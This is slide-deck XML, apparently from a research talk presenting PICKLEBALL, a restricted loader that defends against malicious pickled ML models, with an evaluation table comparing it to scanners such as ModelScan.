            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Google Shape;367;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605975" y="1197500"/>
            <a:ext cx="34086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1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="368" name="Google Shape;368;p32" title="PikPng.com_user-icon-png_398374.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7510100" y="2950112"/>
            <a:ext cx="1029724" cy="1029724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Google Shape;369;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209583" y="2702026"/>
            <a:ext cx="566100" cy="544500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17150">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Google Shape;370;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209583" y="2702014"/>
            <a:ext cx="566175" cy="544316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296525" y="1438999"/>
            <a:ext cx="4027500" cy="626100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>The open model ecosystem lets engineers share and reuse pre-trained models.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296525" y="2571749"/>
            <a:ext cx="4027500" cy="626100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Models may come from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>untrusted sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>, inviting security risks.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674050" y="3704500"/>
            <a:ext cx="1473000" cy="736500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D2E9"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Weights backdoors</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2541575" y="3704500"/>
            <a:ext cx="1473000" cy="736500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D2E9"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>System compromise backdoors</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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32" name="Shape 932"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="933" name="Google Shape;933;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934" name="Google Shape;934;p77"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="935" name="Google Shape;935;p77"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="936" name="Google Shape;936;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="2337050"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Static analysis tool integrated on Hugging Face.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Google Shape;937;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394200" y="898725"/>
            <a:ext cx="4736100" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>is compared to  State of the Art solutions.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="938" name="Google Shape;938;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294625"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="939" name="Google Shape;939;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294637"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="940" name="Google Shape;940;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
